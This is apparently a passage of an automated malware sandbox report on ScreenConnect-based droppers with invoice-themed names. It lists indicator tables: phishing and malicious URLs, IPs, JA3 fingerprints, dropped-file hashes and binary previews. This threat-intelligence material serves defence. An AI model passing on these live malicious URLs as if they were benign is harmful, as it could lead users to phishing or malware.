otohelp.top	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
fp2e7a.wpc.phicdn.net	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://tvsurf.jp/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://racrodisaver.co.in/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.elightsailorsbank.uksfholdings.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://sanbernardinoscounty.telcom-info.com/	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	192.229.221.95
bg.microsoft.map.fastly.net	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	GfgdCOTAYU.dll	Get hash	malicious	Unknown	Browse	199.232.214.172
	1iH5ABLKIA.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	199.232.210.172
	https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.elightsailorsbank.uksfholdings.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://sanbernardinoscounty.telcom-info.com/	Get hash	malicious	HtmlDropper	Browse	199.232.210.172
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OTAVANET-ASCZ	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	mrKs8EKXbz.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	Statement.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.42
	bin homebots io.bat	Get hash	malicious	Unknown	Browse	79.110.49.144
	yJrZoOsgfl.exe	Get hash	malicious	Unknown	Browse	79.110.49.144

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	79.110.49.16
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	79.110.49.16
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	404.exe	Get hash	malicious	Unknown	Browse	79.110.49.16
	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	79.110.49.16
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	79.110.49.16
	e6y2SzRzyr.vbs	Get hash	malicious	PureLog Stealer	Browse	79.110.49.16
	ejdc7iP3A7.vbs	Get hash	malicious	Remcos	Browse	79.110.49.16
	risTLdc664.vbs	Get hash	malicious	FormBook	Browse	79.110.49.16

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	vovE92JSzK.exe	Get hash	malicious	ScreenConnect Tool	Browse
	s9POKY8U8k.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.307361617283494
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrV:KooCEYhgYEL0In
MD5:	018BF6579696FC59EB355EEC7A76D124
SHA1:	C535B7119E4DEE983BE232DE636D3C0FB6D26AFE
SHA-256:	DCA2AD0BE0430218A6DFA75061CD91C2EA318EC38409EE9C072B10E54A9FE5F5
SHA-512:	A81DC3DCE6B33EFF34900EC7BFAC6F53524800FE4EF8762367940AB787D3F8D18EB80AD977C23BC4DABE43FC0CF00B8A7694B77B1256B9BA8ECF0F7CAA6FA731
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x33ec7d31, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42213515009213265
Encrypted:	false
SSDEEP:	1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
MD5:	3BEAD07CAE34BFEE30C5DB41B9D745B7
SHA1:	69B61E866EB518C8109F2A3C114AAC3C0F09E15C
SHA-256:	2CE518B5B76CCD8A9B369A7DB3A83FD81A65871B40BF8E2D848626E46C5420AD
SHA-512:	9FF3A4465ED56569F8F27E80F07FBB682C2EAAC5346D39F30D6B66A07DA761C51CB7233C7472D0800061B04C2E665CC3B4A843D1582A8CC60C29423BFFB49795
Malicious:	false
Reputation:	low
Preview:	3.}1... .......A.......X\...;...{......................0.!..........{A.0....\|i.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................0....\|i.....................0....\|i..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0767459277491109
Encrypted:	false
SSDEEP:	3:LyKYeiNBdluhajn13a/BxVNYlll/ollcVO/lnlZMxZNQl:2Kz0D0ha53qLg/AOewk
MD5:	CD7A250710B6BB00E29EBED5E6D8DE99
SHA1:	6223ED7D94797644B1A8FC60A282BF14EE932A04
SHA-256:	1CBC6E8DF8F201935A6D9FD90F1B304EA59E845B5C6DE8A3CFDCAD86AB97A3B6
SHA-512:	FBEC110C32FDA623E81719371A3F47FE55A93C31CB558C91F1F93BC15828A74A4C1EF3EDF6E632EEF72B6B27C501CD35DE83188C38B17D3434E7975C9BA1A55E
Malicious:	false
Preview:	.........................................;...{..0....\|i......{A..............{A......{A..........{A]....................0....\|i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_E_BILL9926378035_2394ffaf9ddf91f81c1bd23bfb8afd7b4f4227a_1e075fbf_f9d8b530-db1c-45f7-be19-b443ecd401f7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.91878075034374
Encrypted:	false
SSDEEP:	192:b9FbR22KP0BU/Aja0ozuiFGZ24IO8v0Q:5FN22K8BU/Aj0zuiFGY4IO8v0Q
MD5:	2F30909FC895AF502847129FAFB2E523
SHA1:	30C42224ACFE227D0934EA73F4F7C0AB86462F21
SHA-256:	F633295A38BC612884A3DBF64998926B56D3F55DE34F1537A33F451E18EBE274
SHA-512:	0AB46693FECDB483077DE45D4EADE61A3C75967F41A38A8C0829859194E9B54D62C16722358EDD70FC6ABB4451C7E74AD146247B1DCECDBAC1D6B207A868F25F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.1.6.5.6.6.8.1.1.5.4.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.1.6.5.6.8.5.1.4.6.6.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.d.8.b.5.3.0.-.d.b.1.c.-.4.5.f.7.-.b.e.1.9.-.b.4.4.3.e.c.d.4.0.1.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.f.e.8.0.4.7.e.-.9.9.a.2.-.4.e.8.1.-.8.d.3.3.-.c.b.0.6.8.3.0.5.8.e.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E._.B.I.L.L.9.9.2.6.3.7.8.0.3.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.8.8.-.0.0.0.1.-.0.0.1.4.-.4.2.a.0.-.0.f.b.b.8.2.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.d.9.5.f.7.5.6.7.b.e.2.f.1.1.3.6.4.6.8.a.e.e.f.1.3.6.2.4.5.4.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.b.a.f.c.a.a.8.f.7.c.3.8.1.9.4.c.9.6.7.6.2.7.7.5.e.d.2.1.9.2.7.3.e.9.8.b.4.7.4.!.E._.B.I.L.L.9.9.2.6.3.7.8.0.3.5...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA49C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Oct 2 04:22:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	82348
Entropy (8bit):	1.6659304022484462
Encrypted:	false
SSDEEP:	384:5yK2o7hsChI/cq2WFN3NKtitLvgAi6sSL6mRG:17iChI/c03NUil4csS+
MD5:	BD6950CE46B62FFDBB5EE98700A54A6E
SHA1:	8D66FDE5A20592F761713802D2B9A928A169E9B3
SHA-256:	B29FABB4848D9C1FF568FB35781E154308A1110B240475F39C88405064C7D333
SHA-512:	230C13E54C9FE4316430A0F79705C7B4A05134932D248B48A4DF47429983AE56E2EF9315E9364E77F180AE30BC0EC0CF76688C72FCED273350B259710F041210
Malicious:	false
Preview:	MDMP..a..... ..........f....................................$....;..........T.......8...........T............!.., .......... ...........................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.705698602523103
Encrypted:	false
SSDEEP:	192:R6l7wVeJMX6dke6Y9uSU9SLgmfytFprO89b9Vsfsz/m:R6lXJs6X6YkSU9SLgmfytP9ufsC
MD5:	A8137FA0DDA6C2B6D0A76C4C3F019CCB
SHA1:	D0237E908D89A1F948F90A2DCF3BB7D9FC9BF260
SHA-256:	F295A18482AB731FFC12D0882E1069F8D10F2804E1FC347173CE0F2102A84B52
SHA-512:	C5783804FB39F588618E02AAC5EE2955AE7805CF59E8C7FB21F97BDA40BE64E86409274D3B09F9F7B531B6998133F511F08FAF5899332094B726E5FFCE57B1EF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA970.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.502166963438265
Encrypted:	false
SSDEEP:	48:cvIwWl8zsAJg77aI9oiWWpW8VYpgYm8M4JPQeLFcPRm+q8Kcp8OUC3d:uIjfGI7b37VctJMRmc8bC3d
MD5:	C0DF9CA9C93F760ECCE9E23896484C8A
SHA1:	16C4D57BDE6E875E8274CF9E699BFDE1D5AC516F
SHA-256:	497C52FA7BD436EB44B9DFEC96128F5836B6C8334A043548B76F4FBB8E5A144D
SHA-512:	06299075A88CB363A8196593A0EBDC22FEC5059938DB7D1201283E6F127783E6BD96CAA7D3196CD6A16B55467994E3790732FDC35C9571E3262FB6CF38763BC8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525325" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA98E.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81914
Entropy (8bit):	3.029499566616776
Encrypted:	false
SSDEEP:	1536:eu76svhJy5u58NGfZQLU3Ha6gSzpn9VBpy:eu76svhJy5u58NGfZQLU3HarSzpn9VBI
MD5:	D5467825DEB25A2D7599142F2ED3436C
SHA1:	634AB10E39881E7A8599E8E1A4838CB18AD86457
SHA-256:	71829A713AC9ECB44A6525B3F1136E67AFEFD1047AD9B99C42CD80EFE9799770
SHA-512:	A1060C4C7DDC743CF6ECB72144242D37E14902ED7D40361D7EBBD7FA02D0F0C2728F0C5B2CF2354F8458CCE6D5DAD0D06B1A83FC4791D7CD82024511441FE40A
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA5A.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6858204714965965
Encrypted:	false
SSDEEP:	96:TiZYWIIj8l7FoYhYnWWHSKYEZPGtEi64Yz5wYUX9a1d5MKkAIR+53:2ZDQ02SBUta1d5MKkXI53
MD5:	F3DECFD2148F9A87A6804E20537B1E12
SHA1:	9C4B171D8704B872248C5FCD88339D68F0D2DB3C
SHA-256:	54B644FADA75E8BAB2E32A9E53635DDB59BA97C60FF98DDC4D904F4F147FD626
SHA-512:	CC7FC869DDCF0A9E8A42EA49096D34B602348DE4298AB482536AE936476A0EA1D5E91E7BC170F982F1F31F3E5C7F92FB4EFD81D685ECE78123A1D700B57D32D1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.552295515462603
Encrypted:	false
SSDEEP:	12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
MD5:	D3E1E6C22706565D07C5B9CF083E39F6
SHA1:	12D3BC9406E47A98818A8E21DEEED08DAF79B029
SHA-256:	AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
SHA-512:	BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0....H.............X.Z..hT.F...^.g..n......W.%T.;~.\|LU.......aCW...[....-.k.F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN\|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..1.4.....U.x}n..F....g..\|.......P.\|...G......:.F.w,....mj.kj>..2=9..Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p\|5.6....KN..p.6y..\K........:.T.......q.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
